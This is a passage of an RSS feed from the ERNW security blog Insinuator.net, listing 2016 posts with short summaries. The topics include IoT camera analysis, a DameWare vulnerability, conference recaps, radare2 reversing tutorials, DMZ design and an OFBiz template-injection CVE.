      <guid>https://insinuator.net/2016/10/setting-up-a-research-environment-for-ip-cameras/</guid>
      <description>&lt;p&gt;Embedded devices often serve as an entry point for an attack on a private or corporate network. The infamous attack on HackingTeam, for example, followed exactly this path as was revealed &lt;a href=&#34;http://pastebin.com/raw/0SNSvyjJ&#34;&gt;here&lt;/a&gt;. Although the attack may have been for the greater good (refer also to this great &lt;a href=&#34;https://www.troopers.de/events/troopers16/635_opening_keynote/&#34;&gt;keynote&lt;/a&gt;), such incidents demonstrate that it is important to properly secure your embedded devices. In a recent &lt;a href=&#34;https://www.insinuator.net/2016/04/discover-the-unknown-analyzing-an-iot-device/&#34;&gt;blog post&lt;/a&gt;, Niklaus presented how he analyzed the security posture of a MAX! Cube LAN Gateway. Moreover, Brian reported a few weeks ago on the &lt;a href=&#34;https://insinuator.net/2016/10/how-to-become-part-of-an-iot-botnet/&#34;&gt;security posture of IoT devices&lt;/a&gt; (and in particular on one of his cameras). With this post I would like to share my experiences with analyzing another embedded device: the &lt;a href=&#34;http://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/au/home_network_cameras_indoor_fixed/ic-3116w/&#34;&gt;IC-3116W&lt;/a&gt; IP camera by Edimax. &lt;/p&gt;</description>
    </item>
    <item>
      <title>Welcome to Insinuator.net 2.0</title>
      <link>https://insinuator.net/2016/10/welcome-to-insinuator.net-2.0/</link>
      <pubDate>Fri, 14 Oct 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/10/welcome-to-insinuator.net-2.0/</guid>
      <description>&lt;p&gt;It’s almost exactly seven years since Enno published the very first blog post on Insinuator.net. Meanwhile, quite a few things changed. It’s not only the &lt;em&gt;ERNW Universe&lt;/em&gt; which grew significantly, but also Insinuator’s place within this universe was slightly adjusted. What started as an almost independent IT-Security blog became more and more the major publication medium of ERNW.&lt;/p&gt;&#xA;&lt;p&gt;Therefore, we thought it would be a good time to reflect these changes. Today we release the 2.0 version of Insinuator.net. 2.0 introduces a new look &amp;amp; feel as well as major redesign from a technical point of view while also reflecting Insinuator’s place between the four major players in the ERNW universe:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Black Hat 2016 Summary Part 2.1</title>
      <link>https://insinuator.net/2016/10/black-hat-2016-summary-part-2.1/</link>
      <pubDate>Thu, 06 Oct 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/10/black-hat-2016-summary-part-2.1/</guid>
      <description>&lt;p&gt;A few months ago I had the opportunity to visit this year’s Black Hat in Las Vegas. Due to a few weeks of vacation following the conference here are my delayed 2 cents (part 1)&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;//www.blackhat.com/us-16/briefings.html#abusing-bleeding-edge-web-standards-for-appsec-glory&#34;&gt;&lt;/a&gt;&amp;mdash;bryant-zadegan-&amp;amp;-ryan-lester)&lt;a href=&#34;https://www.blackhat.com/us-16/briefings.html#abusing-bleeding-edge-web-standards-for-appsec-glory&#34;&gt;Abusing Bleeding Edge Web Standards For AppSec Glory&lt;/a&gt; – Bryant Zadegan &amp;amp; Ryan Lester (&lt;a href=&#34;https://www.blackhat.com/docs/us-16/materials/us-16-Zadegan-Abusing-Bleeding-Edge-Web-Standards-For-AppSec-Glory.pdf&#34;&gt;Slides&lt;/a&gt;)&lt;/p&gt;&#xA;&lt;p&gt;Bryant and Ryan talked about new web standards which are already implemented in parts of the current browser jungle. Namely these standard were:&lt;/p&gt;</description>
    </item>
    <item>
      <title>DameWare Vulnerability</title>
      <link>https://insinuator.net/2016/10/dameware-vulnerability/</link>
      <pubDate>Wed, 05 Oct 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/10/dameware-vulnerability/</guid>
      <description>&lt;p&gt;In course of a recent research project, I had a look at SolarWinds DameWare, which is a commercial Remote Access Software product running on Windows Server. I identified a remote file download vulnerability in the download function for the client software that can be exploited remotely and unauthenticated and that allows to download arbitrary files from the server that is running the software.&lt;/p&gt;&#xA;&lt;p&gt;A very simple proof of concept HTTP request to download the C:\Windows\win.ini file of the target machine is the following:&lt;/p&gt;</description>
    </item>
    <item>
      <title>How to Become Part of an IoT Botnet</title>
      <link>https://insinuator.net/2016/10/how-to-become-part-of-an-iot-botnet/</link>
      <pubDate>Sat, 01 Oct 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/10/how-to-become-part-of-an-iot-botnet/</guid>
      <description>&lt;p&gt;I suppose there are many people out there who want to achieve a greater good, fight evil corp and “show those guys”. So why not set a statement and become part of a botnet? #Irony!!! Of course I suppose (hope) that none of you actually want to be part of something like an IoT botnet, but joining could in theory be dead easy. So quite a while back I bought a dead cheap WiFi camera for use at home. It was kind of just as insecure as I had expected, so it got it’s own VLAN and stuff and here is why….&lt;/p&gt;</description>
    </item>
    <item>
      <title>Diving into EMET</title>
      <link>https://insinuator.net/2016/09/diving-into-emet/</link>
      <pubDate>Mon, 26 Sep 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/09/diving-into-emet/</guid>
      <description>&lt;p&gt;Last week, we decided to take a look onto the EMET library provided by Microsoft. This library is intended to introduce several security features to applications which are not explicitly compiled to use them.&lt;/p&gt;&#xA;&lt;p&gt;It also adds an additional layer to protect against typical exploiting techniques by filtering library calls, preventing usage of dangerous functions/components and inserting mitigation technologies.&lt;/p&gt;&#xA;&lt;p&gt;As EMET is already a target for many researchers, we currently only started to get an overview of it’s structure and how the different components are interacting with each other. Today we would like to share some of our results with you.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Attacking BaseStations @Defcon24</title>
      <link>https://insinuator.net/2016/09/attacking-basestations-@defcon24/</link>
      <pubDate>Tue, 20 Sep 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/09/attacking-basestations-@defcon24/</guid>
      <description>&lt;p&gt;Hello Guys,&lt;br&gt;&#xA;back from my vacation I’d like to give you some impressions about Defcon 24 and our talk “Attacking BaseStations”. Defcon itself had a couple of great talks but was a very crowded location. Anyhow, we had a couple of great discussions with the people before and after our talk.&lt;/p&gt;&#xA;&lt;p&gt;The talk “Attacking BaseStations” focussed on attack vectors we simulated in &lt;a href=&#34;https://www.insinuator.net/2015/05/how-to-get-as-basestation/&#34;&gt;our lab&lt;/a&gt;. Besides attacking a BaseStation via Radio interface, in this talk we focussed on local and remote interfaces as introduced in &lt;a href=&#34;https://www.insinuator.net/2014/10/lte-vs-darwin-hackers-to-hackers-conference-11/&#34;&gt;“LTE vs. Darwin”&lt;/a&gt;. As target of evaluation one of our eNodeB’s came into play, which we purchased on the Internet. Anyhow, the talk covered the following attack scenarios:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Introducing the Kernel Space Invaders</title>
      <link>https://insinuator.net/2016/09/introducing-the-kernel-space-invaders/</link>
      <pubDate>Tue, 20 Sep 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/09/introducing-the-kernel-space-invaders/</guid>
      <description>&lt;p&gt;Today it is my pleasure to shortly introduce ERNW’s Capture the Flag team, the Kernel Space Invaders. As a long-time CTF enthusiast, I’m really amazed how many of us make the time to tackle IT security challenges also on the weekends or evenings. Even if we cannot participate in all CTFs out there (which would be challenging anyways given the &lt;a href=&#34;https://ctftime.org/&#34;&gt;large number of CTF events&lt;/a&gt; happening nowadays), we started to compile a &lt;a href=&#34;https://github.com/ernw/ctf-writeups/&#34;&gt;repository&lt;/a&gt; of some of our write-ups — I hope some of you will enjoy!&lt;/p&gt;</description>
    </item>
    <item>
      <title>BSides LV 2016: Recap</title>
      <link>https://insinuator.net/2016/09/bsides-lv-2016-recap/</link>
      <pubDate>Mon, 19 Sep 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/09/bsides-lv-2016-recap/</guid>
      <description>&lt;p&gt;Hey everyone,&lt;/p&gt;&#xA;&lt;p&gt;Just a short recap from my side regarding this year’s BSide in Las Vegas, NV. It was my first time there and I pretty much enjoyed it. After entering the venue on the first con day (Tuesday) I was a little bit shocked, as the staff sent me to the “end of the line just around the corner” – the end being many corners and many floors away 😉 Speaking to some guys while standing in line, time quickly passed by and before finally hitting the registration desk, there were already some people from the staff giving away the conference badges to the waiting folks. The waiting time was no comparison to last year’s DEF CON, where I (and obviously all the other “humans”, how attendees at DEF CON are called) had to wait nearly _four_ hours to get a badge to enter the con. DEF CON staff already calls this the annual “Line Con”. Enough bashing, back to topic 😉&lt;/p&gt;</description>
    </item>
    <item>
      <title>Files Your Webserver Shouldn’t Deliver</title>
      <link>https://insinuator.net/2016/09/files-your-webserver-shouldnt-deliver/</link>
      <pubDate>Sun, 18 Sep 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/09/files-your-webserver-shouldnt-deliver/</guid>
      <description>&lt;p&gt;During penetration tests, we often find interesting files on web servers. Almost as often, those files enable us to carry out further attacks with much higher impact. Inspired by Chris Gate’s great series &lt;a href=&#34;http://carnal0wnage.attackresearch.com/2012/05/from-low-to-pwned-4-browsable.html&#34;&gt;From Low to Pwned&lt;/a&gt;, we decided to share the following small piece.&lt;/p&gt;&#xA;&lt;p&gt;The web server under test did not deliver directory listings. However, the directory contained a &lt;a href=&#34;https://en.wikipedia.org/wiki/.DS_Store&#34;&gt;.DS_Store&lt;/a&gt; file (one of macOS’ many — lets say special — traits). While .DS_Store files store various information, a simple cat shows one relevant characteristic:&lt;/p&gt;</description>
    </item>
    <item>
      <title>SIGS DC Day</title>
      <link>https://insinuator.net/2016/09/sigs-dc-day/</link>
      <pubDate>Fri, 16 Sep 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/09/sigs-dc-day/</guid>
      <description>&lt;p&gt;Today I had to give the pleasure to give a keynote at the &lt;a href=&#34;http://digs.ch/dc-day/&#34;&gt;SIGS DC Day&lt;/a&gt; on the need to evaluate Cloud Service Providers in a way that looks behind (or at least tries to) security whitepapers and certification reports. The slides can be found &lt;a href=&#34;https://www.ernw.de/download/ERNWResearch_TrustEvaluationCloudProvider_mluft.pdf&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;I also particularly enjoyed the following two talks:&lt;/p&gt;&#xA;&lt;p&gt;Sean O’Tool from Swisscom AG covered challenges of an infrastructure to cloud migration. Even though he only briefly touched the topic, I enjoyed his description of their firewalling model: Seeing that centralized firewall operation (or more precisely, rule design and approval) is limited/challenged by the understanding of the application, they transferred control over firewall rule sets (beyond a basic set of infrastructure/ground rules) to the application teams (using of features like OpenStack’s security groups, where he also talked about limitations of those). They compensated the loss of “centralized enforcement by a security group” with rule reviews — an approach that will become way more relevant (and necessary) in the future.&lt;/p&gt;</description>
    </item>
    <item>
      <title>25th USENIX Security Symposium &amp;amp; WOOT Workshop</title>
      <link>https://insinuator.net/2016/09/25th-usenix-security-symposium-amp-woot-workshop/</link>
      <pubDate>Mon, 12 Sep 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/09/25th-usenix-security-symposium-amp-woot-workshop/</guid>
      <description>&lt;p&gt;Last month the annual USENIX Security Symposium with its co-located workshops (WOOT, CSET, FOCI, ASE, and HotSec) was held in Austin, Texas. The program of the conference together with the published papers can be found &lt;a href=&#34;https://www.usenix.org/conference/usenixsecurity16/technical-sessions&#34;&gt;here&lt;/a&gt; and information on the workshops can be found &lt;a href=&#34;https://www.usenix.org/conference/usenixsecurity16/workshops&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;The research topics were quite diverse and included subjects such as low-level attacks, cryptographic attacks, and vehicle attacks. To give you an impression on the research that has been presented at the conference, let us discuss some of the talks in the following:&lt;/p&gt;</description>
    </item>
    <item>
      <title>To Control Something</title>
      <link>https://insinuator.net/2016/09/to-control-something/</link>
      <pubDate>Sat, 10 Sep 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/09/to-control-something/</guid>
      <description>&lt;p&gt;Some years ago I discussed the meaning of the term “control” in &lt;a href=&#34;https://www.insinuator.net/2011/06/broken-trust-part-1-definitions-fundamentals-some-more-reflections-on-rsa/&#34;&gt;this post&lt;/a&gt;, but at the time I was mainly referring to the noun “control”. Given I’ll extensively use the term “control” as a verb in the next parts of “the &lt;a href=&#34;https://www.insinuator.net/2016/08/considerations-on-dmz-design-in-2016-part-1/&#34;&gt;DMZ&lt;/a&gt; &lt;a href=&#34;https://www.insinuator.net/2016/09/considerations-on-dmz-design-in-2016-part-2-a-quick-digression-on-reverse-proxies/&#34;&gt;series&lt;/a&gt;” and some &lt;a href=&#34;http://hardwear.io/schedule_hardwear/&#34;&gt;upcoming&lt;/a&gt; &lt;a href=&#34;http://www.day-con.org/schedule.htm&#34;&gt;talks&lt;/a&gt; I reflected a bit on its meaning (as a verb). In the following I’ll lay out the definition/understanding to be employed at those occasions.&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;http://www.merriam-webster.com/dictionary/control&#34;&gt;Merriam-Webster&lt;/a&gt; defines, amongst others, as follows:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Hardware Hacking Week @ ERNW</title>
      <link>https://insinuator.net/2016/09/hardware-hacking-week-@-ernw/</link>
      <pubDate>Fri, 09 Sep 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/09/hardware-hacking-week-@-ernw/</guid>
      <description>&lt;p&gt;Internal workshops are one of the reoccurring events at ERNW, that help us to gain knowledge in areas outside our usual expertise. One of the recent workshops which happened during the week from August 22nd-25th was Hardware Hacking. Held by Brian Butterly (&lt;a href=&#34;https://twitter.com/BadgeWizard&#34;&gt;@BadgeWizard&lt;/a&gt;) and Dominic Spill &lt;a href=&#34;http://@dominicgs&#34;&gt;(@dominicgs),&lt;/a&gt; this workshop took place in two parts. Brian kickstarted the introductory session by guiding us through the fundamental steps of Hardware Hacking. Brian did an excellent job of making things simpler by giving a detailed explanation on the basic concepts. For a beginner in hardware hacking, the topic could be rather intimidating if not handled properly.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Considerations on DMZ Design in 2016, Part 2: A Quick Digression on Reverse Proxies</title>
      <link>https://insinuator.net/2016/09/considerations-on-dmz-design-in-2016-part-2-a-quick-digression-on-reverse-proxies/</link>
      <pubDate>Thu, 08 Sep 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/09/considerations-on-dmz-design-in-2016-part-2-a-quick-digression-on-reverse-proxies/</guid>
      <description>&lt;p&gt;This is the second part of a series with considerations on DMZ networks in 2016 (part 1 can be found &lt;a href=&#34;https://www.insinuator.net/2016/08/considerations-on-dmz-design-in-2016-part-1/&#34;&gt;here&lt;/a&gt;). Beforehand I had planned to cover classification &amp;amp; segmentation approaches in this one, but after my little rant on how “the business” might approach &amp;amp; think about reverse proxies in the first part, I felt tempted to elaborate a bit further on this particular topic. I kindly ask for your patience 😉 and will digress a bit for the moment.&lt;/p&gt;</description>
    </item>
    <item>
      <title>KNXmap: A KNXnet/IP Scanning and Auditing Tool</title>
      <link>https://insinuator.net/2016/09/knxmap-a-knxnet/ip-scanning-and-auditing-tool/</link>
      <pubDate>Mon, 05 Sep 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/09/knxmap-a-knxnet/ip-scanning-and-auditing-tool/</guid>
      <description>&lt;p&gt;Users of the &lt;a href=&#34;https://en.wikipedia.org/wiki/KNX_(standard)&#34;&gt;KNX&lt;/a&gt;, a standard for home automation bus systems, may already have come across KNXnet/IP (also known as EIBnet/IP): It is an extension for KNX that defines Ethernet as a communication medium for KNX which allows communication with KNX buses over IP driven networks. Additionally, it enables one to couple multiple bus installations over IP gateways, or so called KNXnet/IP gateways.&lt;/p&gt;&#xA;&lt;p&gt;In the course of some KNX related research we’ve had access to various KNXnet/IP gateways from different vendors, most of them coupled in a lab setup for testing purposes. The typical tools used for such tasks are &lt;a href=&#34;https://knx.org/knx-de/software/ets/herunterladen/index.php&#34;&gt;ETS&lt;/a&gt;, the professional software developed by the creators of KNX (proprietary, test licenses available) and &lt;a href=&#34;https://www.auto.tuwien.ac.at/~mkoegler/index.php/eibd&#34;&gt;eibd&lt;/a&gt;, an open source implementation of the KNX standard developed by the TU Vienna.&lt;/p&gt;</description>
    </item>
    <item>
      <title>MRMCD16 – diagnosis:critical</title>
      <link>https://insinuator.net/2016/09/mrmcd16-diagnosiscritical/</link>
      <pubDate>Sat, 03 Sep 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/09/mrmcd16-diagnosiscritical/</guid>
      <description>&lt;p&gt;This year’s &lt;a href=&#34;https://2016.mrmcd.net/en/&#34;&gt;MRMCD16&lt;/a&gt; had a topic that immediately let me submit a talk about medical device security: “diagnosis:critical”. Or to quote the official website:&lt;/p&gt;&#xA;&lt;p&gt;Security issues in soft- and hardware have a low chance of healing, especially in medical IT.&lt;/p&gt;&#xA;&lt;p&gt;Despite years of therapy using code reviews and programming guidelines, we still face huge amounts of vulnerable software that probably is in need of palliative treatment.&lt;/p&gt;&#xA;&lt;p&gt;Security vulnerabilities caused by the invasion of IT in the medical sector are becoming real threats. From insulin pumps over analgesic pumps through to pace makers, more and more medical devices have been hacked already. This year&amp;rsquo;s motto &amp;ldquo;mrmcd2016 - diagnosis:critical&amp;rdquo; stands summarizing for the current state of the whole IT sector.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Reverse Engineering With Radare2 – Part 2</title>
      <link>https://insinuator.net/2016/08/reverse-engineering-with-radare2-part-2/</link>
      <pubDate>Mon, 29 Aug 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/08/reverse-engineering-with-radare2-part-2/</guid>
      <description>&lt;p&gt;Welcome back to the radare2 reversing tutorials. If you’ve missed the previous parts, you can find them &lt;a href=&#34;https://www.insinuator.net/?p=6233&#34;&gt;here&lt;/a&gt; and &lt;a href=&#34;https://www.insinuator.net/2016/08/reverse-engineering-with-radare2-part-1/&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Last time we’ve used the rabin2 application to view the  strings found inside the challenge01 binary to find password candidates. Based on the results we looked into the assembly to find the correct password. In this post, we’ll go through the next challenge and try out some of the features provided by radare2.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Considerations on DMZ Design in 2016, Part 1</title>
      <link>https://insinuator.net/2016/08/considerations-on-dmz-design-in-2016-part-1/</link>
      <pubDate>Sat, 27 Aug 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/08/considerations-on-dmz-design-in-2016-part-1/</guid>
      <description>&lt;p&gt;I’m currently involved in a “DMZ Redesign” effort in a sufficiently large enterprise (800+ hosts in “the DMZ”) and I thought this might be an opportunity to reflect on some aspects of “DMZ networks” in a series of posts.&lt;/p&gt;&#xA;&lt;p&gt;Some of you already know that, at &lt;a href=&#34;https://www.ernw.de/&#34;&gt;ERNW&lt;/a&gt;, we have a tendency to discuss stuff starting with some formal definitions and a bit of abstract (overview) approach. It’s not different this time ;-), so let’s first find out what the term “DMZ” means, what such a thing is considered to be and to deliver, and what the actual state of affairs might be in 2016. Different people within an organization might have quite different understandings in this space.&lt;br&gt;&#xA;Further it’s entirely possible that the DMZ networks are not operated by a company themselves but by an outsourcing partner which then means that “placing a system in the DMZ” becomes “ordering a DMZ [network] port” by means of some web-based procedure or ticket system, which in turn might have a number of interesting implications (we’ll have a dedicated post on those).&lt;/p&gt;</description>
    </item>
    <item>
      <title>ERNW Hardening Repository</title>
      <link>https://insinuator.net/2016/08/ernw-hardening-repository/</link>
      <pubDate>Sun, 21 Aug 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/08/ernw-hardening-repository/</guid>
      <description>&lt;p&gt;Today we started publishing several of our hardening documents to a &lt;a href=&#34;https://github.com/ernw/hardening&#34;&gt;dedicated GitHub repository&lt;/a&gt; — and we’re quite excited about it! It took a while to develop a suitable markdown template to support all the requirements you have when you write a hardening guide, but we’re online now!&lt;/p&gt;&#xA;&lt;p&gt;At the moment, only a few hardening guides are online, but that should continuously increase in the future.&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://github.com/ernw/hardening&#34;&gt;Click here for the GitHub ERNW Hardening Repository!&lt;/a&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Follow-Up on CVE-2016-1409 – IPv6 NDP DoS Vulnerability</title>
      <link>https://insinuator.net/2016/08/follow-up-on-cve-2016-1409-ipv6-ndp-dos-vulnerability/</link>
      <pubDate>Sun, 21 Aug 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/08/follow-up-on-cve-2016-1409-ipv6-ndp-dos-vulnerability/</guid>
      <description>&lt;p&gt;This is a guest post from &lt;a href=&#34;https://twitter.com/kafetzj&#34;&gt;Jed Kafetz&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;After seeing &lt;a href=&#34;https://www.insinuator.net/2016/05/cve-2016-1409-ipv6-ndp-dos-vulnerability-in-cisco-software/&#34;&gt;Christopher’s post&lt;/a&gt; I decided to create a proof using GNS3 and Virtualbox.&lt;br&gt;&#xA;The aim is to perform the exact attacking using Antonios Atlasis’ &lt;a href=&#34;http://www.secfu.net/tools-scripts/&#34;&gt;Chiron tools&lt;/a&gt; and run a Wireshark packet capture to prove the hop limit drops below 255.&lt;/p&gt;&#xA;&lt;p&gt;The following topology is used in GNS3:&lt;/p&gt;&#xA;&lt;p&gt;&lt;img src=&#34;https://www.insinuator.net/wp-content/uploads/2016/08/nw_diagram.png&#34; alt=&#34;nw_diagram&#34;&gt;The routers used are Cisco C372 and the machine labled Ubuntu is running 14.04 LTS Ubuntu Desktop, default installation. F0/0 is on the right and F0/1 is on the left.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Reverse Engineering With Radare2 – Part 1</title>
      <link>https://insinuator.net/2016/08/reverse-engineering-with-radare2-part-1/</link>
      <pubDate>Fri, 19 Aug 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/08/reverse-engineering-with-radare2-part-1/</guid>
      <description>&lt;p&gt;Welcome back to the radare2 reversing tutorials. If you’ve missed the intro, you can find it &lt;a href=&#34;https://www.insinuator.net/?p=6233&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;The last time you got the challenge01 binary and your goal was to find the password for the login. Let’s see how the application looks like:&lt;/p&gt;&#xA;&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ./challenge01&#xA;##################################&#xA;#          Challenge 1           #&#xA;#                                #&#xA;#      (c) 2016 Timo Schmid      #&#xA;##################################&#xA;Enter Password: test&#xA;Wrong!&lt;/code&gt;&lt;/pre&gt;&#xA;&lt;p&gt;The first and simplest step would be to look for strings inside the binary. We could do this either by using the unix utility &lt;em&gt;strings&lt;/em&gt; or the binary analyzing binary from radare &lt;em&gt;rabin2:&lt;/em&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Black Hat 2016 Summary</title>
      <link>https://insinuator.net/2016/08/black-hat-2016-summary/</link>
      <pubDate>Tue, 09 Aug 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/08/black-hat-2016-summary/</guid>
      <description>&lt;p&gt;Just a few days ago I had a blast again at this year’s Black Hat. Some of the talks were really worth listening to, so I wanted to point them out and give a short summary.&lt;/p&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://www.blackhat.com/us-16/briefings.html#using-undocumented-cpu-behavior-to-see-into-kernel-mode-and-break-kaslr-in-the-process&#34;&gt;USING UNDOCUMENTED CPU BEHAVIOR TO SEE INTO KERNEL MODE AND BREAK KASLR IN THE PROCESS&lt;/a&gt; – Anders Fogh &amp;amp; Daniel Gruss&lt;/p&gt;&#xA;&lt;p&gt;They had the last slot at the last day of Black Hat which resulted in a kind of empty room, but in my opinion it was an awesome talk and I even had the pleasure to meet these two guys at our ERNW dinner.&lt;/p&gt;</description>
    </item>
    <item>
      <title>PFX Profiles in Microsoft’s System Management Server</title>
      <link>https://insinuator.net/2016/08/pfx-profiles-in-microsofts-system-management-server/</link>
      <pubDate>Fri, 05 Aug 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/08/pfx-profiles-in-microsofts-system-management-server/</guid>
      <description>&lt;p&gt;In a recent assessment, we had to evaluate how Microsoft’s System Management Server (SMS) certificate management solution (CMS) stores and handles certificates. This question came up because sensitive, encrypted user certificates were to be stored in the SMS CMS. Due to the sensitivity of the handled certificates, we assessed the protection capabilities of the certificate management solution against extraction attempts from a local attacker with administrative privileges.&lt;/p&gt;&#xA;&lt;h2 id=&#34;how-did-we-do-it&#34;&gt;How did we do it?&lt;/h2&gt;&#xA;&lt;p&gt;We determined a five steps approach to gain access to the certificates and be able to decrypt the accessed certificate material:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Reverse Engineering With Radare2 – Intro</title>
      <link>https://insinuator.net/2016/08/reverse-engineering-with-radare2-intro/</link>
      <pubDate>Wed, 03 Aug 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/08/reverse-engineering-with-radare2-intro/</guid>
      <description>&lt;p&gt;As some of you may know, there is a “new” reverse engineering toolkit out there which tries to compete with IDA Pro in terms of reverse engineering. I’m talking about &lt;a href=&#34;http://radare.org/r/index.html&#34;&gt;radare2&lt;/a&gt;, a framework for reversing, patching, debugging and exploiting.&lt;/p&gt;&#xA;&lt;p&gt;It has large scripting capabilities, runs on all major plattforms (Android, GNU/Linux, [Net|Free|Open]BSD, iOS, OSX, QNX, w32, w64, Solaris, Haiku, FirefoxOS and even on your pebble smartwatch 😉 ) and is free.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Pentesting Webservices with Net.TCP Binding</title>
      <link>https://insinuator.net/2016/08/pentesting-webservices-with-net.tcp-binding/</link>
      <pubDate>Mon, 01 Aug 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/08/pentesting-webservices-with-net.tcp-binding/</guid>
      <description>&lt;p&gt;Hi all,&lt;/p&gt;&#xA;&lt;p&gt;Most of you that are  pentesters  may have already tested plenty of webservices using SOAP (&lt;em&gt;Simple Object Access Protocol&lt;/em&gt;)* *for communication. Typically, such SOAP messages are transferred over HTTP (&lt;em&gt;Hypertext Transfer Protocol&lt;/em&gt;) and are encapsulated in XML (&lt;em&gt;Extensible Markup Language&lt;/em&gt;). Microsoft has developed different representations of this protocols to reduce the network load. As these representations/protocols aren’t really covered by typical tools out there, this post will show you some of them, and a proxy which can be used to simplify the testing.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Not Sure Which Talks to Attend at BHUSA?</title>
      <link>https://insinuator.net/2016/07/not-sure-which-talks-to-attend-at-bhusa/</link>
      <pubDate>Fri, 29 Jul 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/07/not-sure-which-talks-to-attend-at-bhusa/</guid>
      <description>&lt;p&gt;Hi,&lt;/p&gt;&#xA;&lt;p&gt;I won’t be in Vegas for Black Hat this year as there’s a direct conflict with one of my kids’ birthdays, but I thought one or another reader might find it helpful to get some inspiration as for selecting the talks to catch (not least as there’s so many interesting ones). I hence decided to quickly write this post.&lt;/p&gt;&#xA;&lt;p&gt;Here’s my would-be schedule for the first day (second day to follow, maybe, in another post), under the assumption to attend exactly one talk per slot. I could give a longer rationale per talk than the one below, based on several (mostly technical) factors, but this is just about providing suggestions in a brief form.&lt;br&gt;&#xA;Disclaimer: I was on the &lt;a href=&#34;https://www.blackhat.com/review-board.html&#34;&gt;BH guest review board&lt;/a&gt; this year so I might be biased in some cases.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Remote Code Execution via Server Side Template Injection at OFBiz 13.07.03 (CVE-2016-4462)</title>
      <link>https://insinuator.net/2016/07/remote-code-execution-via-server-side-template-injection-at-ofbiz-13.07.03-cve-2016-4462/</link>
      <pubDate>Fri, 29 Jul 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/07/remote-code-execution-via-server-side-template-injection-at-ofbiz-13.07.03-cve-2016-4462/</guid>
      <description>&lt;p&gt;Dear Reader,&lt;/p&gt;&#xA;&lt;p&gt;this blog post is about Server Side Template Injections for the Apache Freemarker Template Engine, how to detect them, how to craft an exploit and what countermeasures can be implemented. Server Side Template Injections are critical because they often allow even Remote Code Execution, like the exploit of Apache OFBiz 13.07.03 that triggered this post in the first place. It is fair to note, that the exploit of Apache OFBiz requires a valid session with the server, but often this is just an inconvenience for an attacker.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Your Mouse Got Sick and You Don’t Know it. aka “Reverse Shell via Mouse”</title>
      <link>https://insinuator.net/2016/07/your-mouse-got-sick-and-you-dont-know-it.-aka-reverse-shell-via-mouse/</link>
      <pubDate>Fri, 29 Jul 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/07/your-mouse-got-sick-and-you-dont-know-it.-aka-reverse-shell-via-mouse/</guid>
